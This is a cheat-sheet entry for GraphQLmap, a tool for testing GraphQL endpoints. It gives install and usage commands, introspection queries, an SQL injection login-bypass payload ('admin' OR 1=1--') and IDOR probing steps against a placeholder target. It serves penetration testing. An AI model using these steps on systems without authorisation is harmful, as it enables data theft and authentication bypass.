Description
GraphQLmap is a scripting engine for interacting with and exploiting GraphQL endpoints. It supports introspection queries, query/mutation field enumeration, SQL/NoSQL injection through GraphQL parameters, and field suggestions via typo-based discovery.
Installation
BASH
git clone https://github.com/swisskyrepo/GraphQLmap.git
cd GraphQLmap
pip3 install -r requirements.txtBasic Usage
BASH
# Connect to GraphQL endpoint
python3 graphqlmap.py -u https://target.com/graphql
# Interactive shell commands:
# dump_new — Dump schema using introspection
# dump_old — Legacy introspection dump
# nosqli — NoSQL injection test
# sqli — SQL injection testAdvanced Usage
BASH
# With authentication
python3 graphqlmap.py -u https://target.com/graphql \
--headers '{"Authorization": "Bearer TOKEN"}'
# Method override (use GET)
python3 graphqlmap.py -u https://target.com/graphql --method GET
# Custom proxy
python3 graphqlmap.py -u https://target.com/graphql --proxy http://127.0.0.1:8080
# Inline query
python3 graphqlmap.py -u https://target.com/graphql \
--query '{ users { id name email } }'Common Workflows
BASH
# Step 1: Check if introspection is enabled
curl -s -X POST https://target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { queryType { name } mutationType { name } } }"}' | jq
# Step 2: Dump schema
python3 graphqlmap.py -u https://target.com/graphql
> dump_new
# Step 3: Look for sensitive queries
# users, admin, internal, config, debug
# Step 4: Test injections on mutation inputs
> sqli { mutation { login(user: "admin' OR 1=1--", pass: "x") { token } } }
# Step 5: Test IDOR
# Query user data with different IDs
# { user(id: 1) { email } }
# { user(id: 2) { email } }